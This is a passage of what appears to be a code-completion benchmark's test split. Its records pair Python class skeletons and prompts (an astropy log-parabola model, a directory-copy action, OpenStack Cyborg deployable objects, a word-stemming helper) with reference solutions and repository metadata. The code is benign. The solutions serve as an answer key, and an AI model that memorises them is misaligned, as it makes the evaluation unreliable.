2\n d_x_0 = amplitude * d_amplitude * (beta * log_xx / x_0 - exponent / x_0)\n d_alpha = -amplitude * d_amplitude * log_xx\n return [d_amplitude, d_x_0, d_alpha, d_beta]\n<|end_body_1|>\n", "revision_id": "2c9002f16bb5c265e0d14f4a2314c86eeaa35cb6", "skeleton": "<|skeleton|>\nclass LogParabola1D:\n \"\"\"One dimensional log parabola model (sometimes called curved power law). Parameters ---------- amplitude : float Model amplitude x_0 : float Reference point alpha : float Power law index beta : float Power law curvature See Also -------- PowerLaw1D, BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D Notes ----- Model formula (with :math:`A` for ``amplitude`` and :math:`\\\\alpha` for ``alpha`` and :math:`\\\\beta` for ``beta``): .. math:: f(x) = A \\\\left(\\\\frac{x}{x_{0}}\\\\right)^{- \\\\alpha - \\\\beta \\\\log{\\\\left (\\\\frac{x}{x_{0}} \\\\right )}}\"\"\"\n\n def evaluate(x, amplitude, x_0, alpha, beta):\n \"\"\"One dimensional log parabola model function\"\"\"\n <|body_0|>\n\n def fit_deriv(x, amplitude, x_0, alpha, beta):\n \"\"\"One dimensional log parabola derivative with respect to parameters\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LogParabola1D:\n \"\"\"One dimensional log parabola model (sometimes called curved power law). Parameters ---------- amplitude : float Model amplitude x_0 : float Reference point alpha : float Power law index beta : float Power law curvature See Also -------- PowerLaw1D, BrokenPowerLaw1D, ExponentialCutoffPowerLaw1D Notes ----- Model formula (with :math:`A` for ``amplitude`` and :math:`\\\\alpha` for ``alpha`` and :math:`\\\\beta` for ``beta``): .. math:: f(x) = A \\\\left(\\\\frac{x}{x_{0}}\\\\right)^{- \\\\alpha - \\\\beta \\\\log{\\\\left (\\\\frac{x}{x_{0}} \\\\right )}}\"\"\"\n\n def evaluate(x, amplitude, x_0, alpha, beta):\n \"\"\"One dimensional log parabola model function\"\"\"\n xx = x / x_0\n exponent = -alpha - beta * np.log(xx)\n return amplitude * xx ** exponent\n\n def fit_deriv(x, amplitude, x_0, alpha, beta):\n \"\"\"One dimensional log parabola derivative with respect to parameters\"\"\"\n xx = x / x_0\n log_xx = np.log(xx)\n exponent = -alpha - beta * log_xx\n d_amplitude = xx ** exponent\n d_beta = -amplitude * d_amplitude * log_xx ** 2\n d_x_0 = amplitude * d_amplitude * (beta * log_xx / x_0 - exponent / x_0)\n d_alpha = -amplitude * d_amplitude * log_xx\n return [d_amplitude, d_x_0, d_alpha, d_beta]\n", "source": "the_stack_v2_python_sparse", "source_path": "lib/python2.7/site-packages/astropy/modeling/powerlaws.py", "source_repo": "wangyum/Anaconda", "split": "test", "star_events_count": 11} {"blob_id": "fc099052310bca63f0cb51323d091e23546c163f", "bodies": ["ExecutionContext().transition(ExecutionContext.phases.VERIFICATION)\nlogstr = 'DirCopy: Checking source is readable + traversable, ' + '{0}'.format(self.dst)\nlogger.info('{0}: {1}'.format(self.file_context, logstr))\nif not filesys.access(self.src, access_codes.R_OK | access_codes.X_OK):\n return self.verification_codes.UNREADABLE_SOURCE\nlogger.info('{0}: DirCopy: Checking target is writeable, \"{1}\"'.format(self.file_context, self.dst))\nif not filesys.access(paths.dirname(self.dst), access_codes.W_OK):\n return self.verification_codes.UNWRITABLE_TARGET\nreturn self.verification_codes.OK", "vcode = self.verify_can_exec(filesys)\nif vcode == self.verification_codes.UNREADABLE_SOURCE:\n logstr = 'DirCopy: Non-Readable source directory \"%s\"' % self.src\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\nif vcode == self.verification_codes.UNWRITABLE_TARGET:\n logstr = 'DirCopy: Non-Writable target directory \"%s\"' % self.dst\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\nExecutionContext().transition(ExecutionContext.phases.EXECUTION)\nlogstr = 'Performing Directory Copy \"%s\" -> \"%s\"' % (self.src, self.dst)\nlogger.info('{0}: {1}'.format(self.file_context, logstr))\nfilesys.copy(self.src, self.dst)"], "bodies_text": "<|body_start_0|>\n ExecutionContext().transition(ExecutionContext.phases.VERIFICATION)\n logstr = 'DirCopy: Checking source is readable + traversable, ' + '{0}'.format(self.dst)\n logger.info('{0}: {1}'.format(self.file_context, logstr))\n if not filesys.access(self.src, access_codes.R_OK | access_codes.X_OK):\n return self.verification_codes.UNREADABLE_SOURCE\n logger.info('{0}: DirCopy: Checking target is writeable, \"{1}\"'.format(self.file_context, self.dst))\n if not filesys.access(paths.dirname(self.dst), access_codes.W_OK):\n return self.verification_codes.UNWRITABLE_TARGET\n return self.verification_codes.OK\n<|end_body_0|>\n\n<|body_start_1|>\n vcode = self.verify_can_exec(filesys)\n if vcode == self.verification_codes.UNREADABLE_SOURCE:\n logstr = 'DirCopy: Non-Readable source directory \"%s\"' % self.src\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\n if vcode == self.verification_codes.UNWRITABLE_TARGET:\n logstr = 'DirCopy: Non-Writable target directory \"%s\"' % self.dst\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\n ExecutionContext().transition(ExecutionContext.phases.EXECUTION)\n logstr = 'Performing Directory Copy \"%s\" -> \"%s\"' % (self.src, self.dst)\n logger.info('{0}: {1}'.format(self.file_context, logstr))\n filesys.copy(self.src, self.dst)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "DirCopyAction", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DirCopyAction:\n\n def verify_can_exec(self, filesys):\n \"\"\"Check to ensure that execution can proceed without errors. Ensures that the the target directory is writable.\"\"\"\n <|body_0|>\n\n def execute(self, filesys):\n \"\"\"Copy a directory tree from one location to another.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ExecutionContext().transition(ExecutionContext.phases.VERIFICATION)\n logstr = 'DirCopy: Checking source is readable + traversable, ' + '{0}'.format(self.dst)\n logger.info('{0}: {1}'.format(self.file_context, logstr))\n if not filesys.access(self.src, access_codes.R_OK | access_codes.X_OK):\n return self.verification_codes.UNREADABLE_SOURCE\n logger.info('{0}: DirCopy: Checking target is writeable, \"{1}\"'.format(self.file_context, self.dst))\n if not filesys.access(paths.dirname(self.dst), access_codes.W_OK):\n return self.verification_codes.UNWRITABLE_TARGET\n return self.verification_codes.OK\n<|end_body_0|>\n\n<|body_start_1|>\n vcode = self.verify_can_exec(filesys)\n if vcode == self.verification_codes.UNREADABLE_SOURCE:\n logstr = 'DirCopy: Non-Readable source directory \"%s\"' % self.src\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\n if vcode == self.verification_codes.UNWRITABLE_TARGET:\n logstr = 'DirCopy: Non-Writable target directory \"%s\"' % self.dst\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\n ExecutionContext().transition(ExecutionContext.phases.EXECUTION)\n logstr = 'Performing Directory Copy \"%s\" -> \"%s\"' % (self.src, self.dst)\n logger.info('{0}: {1}'.format(self.file_context, logstr))\n filesys.copy(self.src, self.dst)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000278", "length_bytes": 2041, "license_type": "permissive", "methods": [{"docstring": "Check to ensure that execution can proceed without errors. Ensures that the the target directory is writable.", "name": "verify_can_exec", "signature": "def verify_can_exec(self, filesys)"}, {"docstring": "Copy a directory tree from one location to another.", "name": "execute", "signature": "def execute(self, filesys)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007349", "prompt": "Implement the Python class `DirCopyAction` described below.\n\nClass description:\nImplement the DirCopyAction class.\n\nMethod signatures and docstrings:\n- def verify_can_exec(self, filesys): Check to ensure that execution can proceed without errors. Ensures that the the target directory is writable.\n- def execute(self, filesys): Copy a directory tree from one location to another.", "prompted_full_text": "Implement the Python class `DirCopyAction` described below.\n\nClass description:\nImplement the DirCopyAction class.\n\nMethod signatures and docstrings:\n- def verify_can_exec(self, filesys): Check to ensure that execution can proceed without errors. Ensures that the the target directory is writable.\n- def execute(self, filesys): Copy a directory tree from one location to another.\n\n<|skeleton|>\nclass DirCopyAction:\n\n def verify_can_exec(self, filesys):\n \"\"\"Check to ensure that execution can proceed without errors. Ensures that the the target directory is writable.\"\"\"\n <|body_0|>\n\n def execute(self, filesys):\n \"\"\"Copy a directory tree from one location to another.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n ExecutionContext().transition(ExecutionContext.phases.VERIFICATION)\n logstr = 'DirCopy: Checking source is readable + traversable, ' + '{0}'.format(self.dst)\n logger.info('{0}: {1}'.format(self.file_context, logstr))\n if not filesys.access(self.src, access_codes.R_OK | access_codes.X_OK):\n return self.verification_codes.UNREADABLE_SOURCE\n logger.info('{0}: DirCopy: Checking target is writeable, \"{1}\"'.format(self.file_context, self.dst))\n if not filesys.access(paths.dirname(self.dst), access_codes.W_OK):\n return self.verification_codes.UNWRITABLE_TARGET\n return self.verification_codes.OK\n<|end_body_0|>\n\n<|body_start_1|>\n vcode = self.verify_can_exec(filesys)\n if vcode == self.verification_codes.UNREADABLE_SOURCE:\n logstr = 'DirCopy: Non-Readable source directory \"%s\"' % self.src\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\n if vcode == self.verification_codes.UNWRITABLE_TARGET:\n logstr = 'DirCopy: Non-Writable target directory \"%s\"' % self.dst\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\n ExecutionContext().transition(ExecutionContext.phases.EXECUTION)\n logstr = 'Performing Directory Copy \"%s\" -> \"%s\"' % (self.src, self.dst)\n logger.info('{0}: {1}'.format(self.file_context, logstr))\n filesys.copy(self.src, self.dst)\n<|end_body_1|>\n", "revision_id": "5711b5c71e39b958bc8185c6b893358de7598ae2", "skeleton": "<|skeleton|>\nclass DirCopyAction:\n\n def verify_can_exec(self, filesys):\n \"\"\"Check to ensure that execution can proceed without errors. Ensures that the the target directory is writable.\"\"\"\n <|body_0|>\n\n def execute(self, filesys):\n \"\"\"Copy a directory tree from one location to another.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DirCopyAction:\n def verify_can_exec(self, filesys):\n \"\"\"Check to ensure that execution can proceed without errors. Ensures that the the target directory is writable.\"\"\"\n ExecutionContext().transition(ExecutionContext.phases.VERIFICATION)\n logstr = 'DirCopy: Checking source is readable + traversable, ' + '{0}'.format(self.dst)\n logger.info('{0}: {1}'.format(self.file_context, logstr))\n if not filesys.access(self.src, access_codes.R_OK | access_codes.X_OK):\n return self.verification_codes.UNREADABLE_SOURCE\n logger.info('{0}: DirCopy: Checking target is writeable, \"{1}\"'.format(self.file_context, self.dst))\n if not filesys.access(paths.dirname(self.dst), access_codes.W_OK):\n return self.verification_codes.UNWRITABLE_TARGET\n return self.verification_codes.OK\n\n def execute(self, filesys):\n \"\"\"Copy a directory tree from one location to another.\"\"\"\n vcode = self.verify_can_exec(filesys)\n if vcode == self.verification_codes.UNREADABLE_SOURCE:\n logstr = 'DirCopy: Non-Readable source directory \"%s\"' % self.src\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\n if vcode == self.verification_codes.UNWRITABLE_TARGET:\n logstr = 'DirCopy: Non-Writable target directory \"%s\"' % self.dst\n logger.warn('{0}: {1}'.format(self.file_context, logstr))\n return\n ExecutionContext().transition(ExecutionContext.phases.EXECUTION)\n logstr = 'Performing Directory Copy \"%s\" -> \"%s\"' % (self.src, self.dst)\n logger.info('{0}: {1}'.format(self.file_context, logstr))\n filesys.copy(self.src, self.dst)\n", "source": "the_stack_v2_python_sparse", "source_path": "salve/action/copy/directory.py", "source_repo": "sirosen/SALVE", "split": "test", "star_events_count": 0} {"blob_id": "dbf8940ed3023eb789da4e9bf24c4b8d091529ff", "bodies": ["deployable_obj = Deployable(context=context, name=self.name, num_accelerators=self.num_accelerators, device_id=device_id, driver_name=self.driver_name)\ndeployable_obj.create(context)\nif hasattr(self, 'attribute_list'):\n for driver_attr in self.attribute_list:\n driver_attr.create(context, deployable_obj.id)\nif hasattr(self, 'attach_handle_list'):\n for driver_attach_handle in self.attach_handle_list:\n driver_attach_handle.create(context, deployable_obj.id, cpid_id)", "dep_obj = Deployable.get_by_name_deviceid(context, self.name, device_id)\nif hasattr(self, 'attach_handle_list'):\n for driver_ah_obj in self.attach_handle_list:\n driver_ah_obj.destroy(context, dep_obj.id)\nif hasattr(self, 'attribute_list'):\n DriverAttribute.destroy(context, dep_obj.id)\nif dep_obj is not None:\n dep_obj.destroy(context)", "dep_obj_list = Deployable.get_list_by_device_id(context, device_id)\ndriver_dep_obj_list = []\nfor dep_obj in dep_obj_list:\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n driver_dep_obj_list.append(driver_dep_obj)\nreturn driver_dep_obj_list", "dep_obj = Deployable.get_by_name(context, name)\ndriver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\ndriver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\ndriver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\nreturn driver_dep_obj"], "bodies_text": "<|body_start_0|>\n deployable_obj = Deployable(context=context, name=self.name, num_accelerators=self.num_accelerators, device_id=device_id, driver_name=self.driver_name)\n deployable_obj.create(context)\n if hasattr(self, 'attribute_list'):\n for driver_attr in self.attribute_list:\n driver_attr.create(context, deployable_obj.id)\n if hasattr(self, 'attach_handle_list'):\n for driver_attach_handle in self.attach_handle_list:\n driver_attach_handle.create(context, deployable_obj.id, cpid_id)\n<|end_body_0|>\n\n<|body_start_1|>\n dep_obj = Deployable.get_by_name_deviceid(context, self.name, device_id)\n if hasattr(self, 'attach_handle_list'):\n for driver_ah_obj in self.attach_handle_list:\n driver_ah_obj.destroy(context, dep_obj.id)\n if hasattr(self, 'attribute_list'):\n DriverAttribute.destroy(context, dep_obj.id)\n if dep_obj is not None:\n dep_obj.destroy(context)\n<|end_body_1|>\n\n<|body_start_2|>\n dep_obj_list = Deployable.get_list_by_device_id(context, device_id)\n driver_dep_obj_list = []\n for dep_obj in dep_obj_list:\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n driver_dep_obj_list.append(driver_dep_obj)\n return driver_dep_obj_list\n<|end_body_2|>\n\n<|body_start_3|>\n dep_obj = Deployable.get_by_name(context, name)\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n return driver_dep_obj\n<|end_body_3|>\n", "class_docstring": "", "class_name": "DriverDeployable", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DriverDeployable:\n\n def create(self, context, device_id, cpid_id):\n \"\"\"Create a driver-side Deployable object into DB. This object will be stored in separate db tables: deployable & attach_handle & attribute table.\"\"\"\n <|body_0|>\n\n def destroy(self, context, device_id):\n \"\"\"delete one driver-side deployable by calling existing Deployable and AttachHandle Object. Use name&host to identify Deployable and attach_info to identify the AttachHandle\"\"\"\n <|body_1|>\n\n def list(cls, context, device_id):\n \"\"\"Form driver-side Deployable object list from DB for one device.\"\"\"\n <|body_2|>\n\n def get_by_name(cls, context, name):\n \"\"\"Form driver-side Deployable object list from DB for one device.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n deployable_obj = Deployable(context=context, name=self.name, num_accelerators=self.num_accelerators, device_id=device_id, driver_name=self.driver_name)\n deployable_obj.create(context)\n if hasattr(self, 'attribute_list'):\n for driver_attr in self.attribute_list:\n driver_attr.create(context, deployable_obj.id)\n if hasattr(self, 'attach_handle_list'):\n for driver_attach_handle in self.attach_handle_list:\n driver_attach_handle.create(context, deployable_obj.id, cpid_id)\n<|end_body_0|>\n\n<|body_start_1|>\n dep_obj = Deployable.get_by_name_deviceid(context, self.name, device_id)\n if hasattr(self, 'attach_handle_list'):\n for driver_ah_obj in self.attach_handle_list:\n driver_ah_obj.destroy(context, dep_obj.id)\n if hasattr(self, 'attribute_list'):\n DriverAttribute.destroy(context, dep_obj.id)\n if dep_obj is not None:\n dep_obj.destroy(context)\n<|end_body_1|>\n\n<|body_start_2|>\n dep_obj_list = Deployable.get_list_by_device_id(context, device_id)\n driver_dep_obj_list = []\n for dep_obj in dep_obj_list:\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n driver_dep_obj_list.append(driver_dep_obj)\n return driver_dep_obj_list\n<|end_body_2|>\n\n<|body_start_3|>\n dep_obj = Deployable.get_by_name(context, name)\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n return driver_dep_obj\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000279", "length_bytes": 5621, "license_type": "permissive", "methods": [{"docstring": "Create a driver-side Deployable object into DB. This object will be stored in separate db tables: deployable & attach_handle & attribute table.", "name": "create", "signature": "def create(self, context, device_id, cpid_id)"}, {"docstring": "delete one driver-side deployable by calling existing Deployable and AttachHandle Object. Use name&host to identify Deployable and attach_info to identify the AttachHandle", "name": "destroy", "signature": "def destroy(self, context, device_id)"}, {"docstring": "Form driver-side Deployable object list from DB for one device.", "name": "list", "signature": "def list(cls, context, device_id)"}, {"docstring": "Form driver-side Deployable object list from DB for one device.", "name": "get_by_name", "signature": "def get_by_name(cls, context, name)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_val_000311", "prompt": "Implement the Python class `DriverDeployable` described below.\n\nClass description:\nImplement the DriverDeployable class.\n\nMethod signatures and docstrings:\n- def create(self, context, device_id, cpid_id): Create a driver-side Deployable object into DB. This object will be stored in separate db tables: deployable & attach_handle & attribute table.\n- def destroy(self, context, device_id): delete one driver-side deployable by calling existing Deployable and AttachHandle Object. Use name&host to identify Deployable and attach_info to identify the AttachHandle\n- def list(cls, context, device_id): Form driver-side Deployable object list from DB for one device.\n- def get_by_name(cls, context, name): Form driver-side Deployable object list from DB for one device.", "prompted_full_text": "Implement the Python class `DriverDeployable` described below.\n\nClass description:\nImplement the DriverDeployable class.\n\nMethod signatures and docstrings:\n- def create(self, context, device_id, cpid_id): Create a driver-side Deployable object into DB. This object will be stored in separate db tables: deployable & attach_handle & attribute table.\n- def destroy(self, context, device_id): delete one driver-side deployable by calling existing Deployable and AttachHandle Object. Use name&host to identify Deployable and attach_info to identify the AttachHandle\n- def list(cls, context, device_id): Form driver-side Deployable object list from DB for one device.\n- def get_by_name(cls, context, name): Form driver-side Deployable object list from DB for one device.\n\n<|skeleton|>\nclass DriverDeployable:\n\n def create(self, context, device_id, cpid_id):\n \"\"\"Create a driver-side Deployable object into DB. This object will be stored in separate db tables: deployable & attach_handle & attribute table.\"\"\"\n <|body_0|>\n\n def destroy(self, context, device_id):\n \"\"\"delete one driver-side deployable by calling existing Deployable and AttachHandle Object. Use name&host to identify Deployable and attach_info to identify the AttachHandle\"\"\"\n <|body_1|>\n\n def list(cls, context, device_id):\n \"\"\"Form driver-side Deployable object list from DB for one device.\"\"\"\n <|body_2|>\n\n def get_by_name(cls, context, name):\n \"\"\"Form driver-side Deployable object list from DB for one device.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n deployable_obj = Deployable(context=context, name=self.name, num_accelerators=self.num_accelerators, device_id=device_id, driver_name=self.driver_name)\n deployable_obj.create(context)\n if hasattr(self, 'attribute_list'):\n for driver_attr in self.attribute_list:\n driver_attr.create(context, deployable_obj.id)\n if hasattr(self, 'attach_handle_list'):\n for driver_attach_handle in self.attach_handle_list:\n driver_attach_handle.create(context, deployable_obj.id, cpid_id)\n<|end_body_0|>\n\n<|body_start_1|>\n dep_obj = Deployable.get_by_name_deviceid(context, self.name, device_id)\n if hasattr(self, 'attach_handle_list'):\n for driver_ah_obj in self.attach_handle_list:\n driver_ah_obj.destroy(context, dep_obj.id)\n if hasattr(self, 'attribute_list'):\n DriverAttribute.destroy(context, dep_obj.id)\n if dep_obj is not None:\n dep_obj.destroy(context)\n<|end_body_1|>\n\n<|body_start_2|>\n dep_obj_list = Deployable.get_list_by_device_id(context, device_id)\n driver_dep_obj_list = []\n for dep_obj in dep_obj_list:\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n driver_dep_obj_list.append(driver_dep_obj)\n return driver_dep_obj_list\n<|end_body_2|>\n\n<|body_start_3|>\n dep_obj = Deployable.get_by_name(context, name)\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n return driver_dep_obj\n<|end_body_3|>\n", "revision_id": "ab8b8514242895b8adc2ec3dfbbb63a49f02c89e", "skeleton": "<|skeleton|>\nclass DriverDeployable:\n\n def create(self, context, device_id, cpid_id):\n \"\"\"Create a driver-side Deployable object into DB. This object will be stored in separate db tables: deployable & attach_handle & attribute table.\"\"\"\n <|body_0|>\n\n def destroy(self, context, device_id):\n \"\"\"delete one driver-side deployable by calling existing Deployable and AttachHandle Object. Use name&host to identify Deployable and attach_info to identify the AttachHandle\"\"\"\n <|body_1|>\n\n def list(cls, context, device_id):\n \"\"\"Form driver-side Deployable object list from DB for one device.\"\"\"\n <|body_2|>\n\n def get_by_name(cls, context, name):\n \"\"\"Form driver-side Deployable object list from DB for one device.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DriverDeployable:\n def create(self, context, device_id, cpid_id):\n \"\"\"Create a driver-side Deployable object into DB. This object will be stored in separate db tables: deployable & attach_handle & attribute table.\"\"\"\n deployable_obj = Deployable(context=context, name=self.name, num_accelerators=self.num_accelerators, device_id=device_id, driver_name=self.driver_name)\n deployable_obj.create(context)\n if hasattr(self, 'attribute_list'):\n for driver_attr in self.attribute_list:\n driver_attr.create(context, deployable_obj.id)\n if hasattr(self, 'attach_handle_list'):\n for driver_attach_handle in self.attach_handle_list:\n driver_attach_handle.create(context, deployable_obj.id, cpid_id)\n\n def destroy(self, context, device_id):\n \"\"\"delete one driver-side deployable by calling existing Deployable and AttachHandle Object. Use name&host to identify Deployable and attach_info to identify the AttachHandle\"\"\"\n dep_obj = Deployable.get_by_name_deviceid(context, self.name, device_id)\n if hasattr(self, 'attach_handle_list'):\n for driver_ah_obj in self.attach_handle_list:\n driver_ah_obj.destroy(context, dep_obj.id)\n if hasattr(self, 'attribute_list'):\n DriverAttribute.destroy(context, dep_obj.id)\n if dep_obj is not None:\n dep_obj.destroy(context)\n\n def list(cls, context, device_id):\n \"\"\"Form driver-side Deployable object list from DB for one device.\"\"\"\n dep_obj_list = Deployable.get_list_by_device_id(context, device_id)\n driver_dep_obj_list = []\n for dep_obj in dep_obj_list:\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n driver_dep_obj_list.append(driver_dep_obj)\n return driver_dep_obj_list\n\n def get_by_name(cls, context, name):\n \"\"\"Form driver-side Deployable object list from DB for one device.\"\"\"\n dep_obj = Deployable.get_by_name(context, name)\n driver_ah_obj_list = DriverAttachHandle.list(context, dep_obj.id)\n driver_attr_obj_list = DriverAttribute.list(context, dep_obj.id)\n driver_dep_obj = cls(context=context, name=dep_obj.name, num_accelerators=dep_obj.num_accelerators, attribute_list=driver_attr_obj_list, attach_handle_list=driver_ah_obj_list)\n return driver_dep_obj\n", "source": "the_stack_v2_python_sparse", "source_path": "cyborg/objects/driver_objects/driver_deployable.py", "source_repo": "openstack/cyborg", "split": "test", "star_events_count": 41} {"blob_id": "3ecba5e53a0030b52cda723137f6b55a5e94134f", "bodies": ["stemmed = global_stemmer.stem(word)\nif stemmed not in cls.word_lookup:\n cls.word_lookup[stemmed] = {}\ncls.word_lookup[stemmed][word] = cls.word_lookup[stemmed].get(word, 0) + 1\nreturn stemmed", "if word in cls.word_lookup:\n return max(cls.word_lookup[word].keys(), key=lambda x: cls.word_lookup[word][x])\nelse:\n return word"], "bodies_text": "<|body_start_0|>\n stemmed = global_stemmer.stem(word)\n if stemmed not in cls.word_lookup:\n cls.word_lookup[stemmed] = {}\n cls.word_lookup[stemmed][word] = cls.word_lookup[stemmed].get(word, 0) + 1\n return stemmed\n<|end_body_0|>\n\n<|body_start_1|>\n if word in cls.word_lookup:\n return max(cls.word_lookup[word].keys(), key=lambda x: cls.word_lookup[word][x])\n else:\n return word\n<|end_body_1|>\n", "class_docstring": "Class to aid the stemming process - from word to stemmed form, and vice versa. The 'original' form of a stemmed word will be returned as the form in which its been used the most number of times in the text.", "class_name": "StemmingHelper", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass StemmingHelper:\n \"\"\"Class to aid the stemming process - from word to stemmed form, and vice versa. The 'original' form of a stemmed word will be returned as the form in which its been used the most number of times in the text.\"\"\"\n\n def stem(cls, word):\n \"\"\"Stems a word and updates the reverse lookup.\"\"\"\n <|body_0|>\n\n def original_form(cls, word):\n \"\"\"Returns original form of a word given the stemmed version, as stored in the word lookup.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n stemmed = global_stemmer.stem(word)\n if stemmed not in cls.word_lookup:\n cls.word_lookup[stemmed] = {}\n cls.word_lookup[stemmed][word] = cls.word_lookup[stemmed].get(word, 0) + 1\n return stemmed\n<|end_body_0|>\n\n<|body_start_1|>\n if word in cls.word_lookup:\n return max(cls.word_lookup[word].keys(), key=lambda x: cls.word_lookup[word][x])\n else:\n return word\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000280", "length_bytes": 3980, "license_type": "no_license", "methods": [{"docstring": "Stems a word and updates the reverse lookup.", "name": "stem", "signature": "def stem(cls, word)"}, {"docstring": "Returns original form of a word given the stemmed version, as stored in the word lookup.", "name": "original_form", "signature": "def original_form(cls, word)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002273", "prompt": "Implement the Python class `StemmingHelper` described below.\n\nClass description:\nClass to aid the stemming process - from word to stemmed form, and vice versa. The 'original' form of a stemmed word will be returned as the form in which its been used the most number of times in the text.\n\nMethod signatures and docstrings:\n- def stem(cls, word): Stems a word and updates the reverse lookup.\n- def original_form(cls, word): Returns original form of a word given the stemmed version, as stored in the word lookup.", "prompted_full_text": "Implement the Python class `StemmingHelper` described below.\n\nClass description:\nClass to aid the stemming process - from word to stemmed form, and vice versa. The 'original' form of a stemmed word will be returned as the form in which its been used the most number of times in the text.\n\nMethod signatures and docstrings:\n- def stem(cls, word): Stems a word and updates the reverse lookup.\n- def original_form(cls, word): Returns original form of a word given the stemmed version, as stored in the word lookup.\n\n<|skeleton|>\nclass StemmingHelper:\n \"\"\"Class to aid the stemming process - from word to stemmed form, and vice versa. The 'original' form of a stemmed word will be returned as the form in which its been used the most number of times in the text.\"\"\"\n\n def stem(cls, word):\n \"\"\"Stems a word and updates the reverse lookup.\"\"\"\n <|body_0|>\n\n def original_form(cls, word):\n \"\"\"Returns original form of a word given the stemmed version, as stored in the word lookup.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n stemmed = global_stemmer.stem(word)\n if stemmed not in cls.word_lookup:\n cls.word_lookup[stemmed] = {}\n cls.word_lookup[stemmed][word] = cls.word_lookup[stemmed].get(word, 0) + 1\n return stemmed\n<|end_body_0|>\n\n<|body_start_1|>\n if word in cls.word_lookup:\n return max(cls.word_lookup[word].keys(), key=lambda x: cls.word_lookup[word][x])\n else:\n return word\n<|end_body_1|>\n", "revision_id": "a4247074004c77c078e6d4b7270b517753df51a5", "skeleton": "<|skeleton|>\nclass StemmingHelper:\n \"\"\"Class to aid the stemming process - from word to stemmed form, and vice versa. The 'original' form of a stemmed word will be returned as the form in which its been used the most number of times in the text.\"\"\"\n\n def stem(cls, 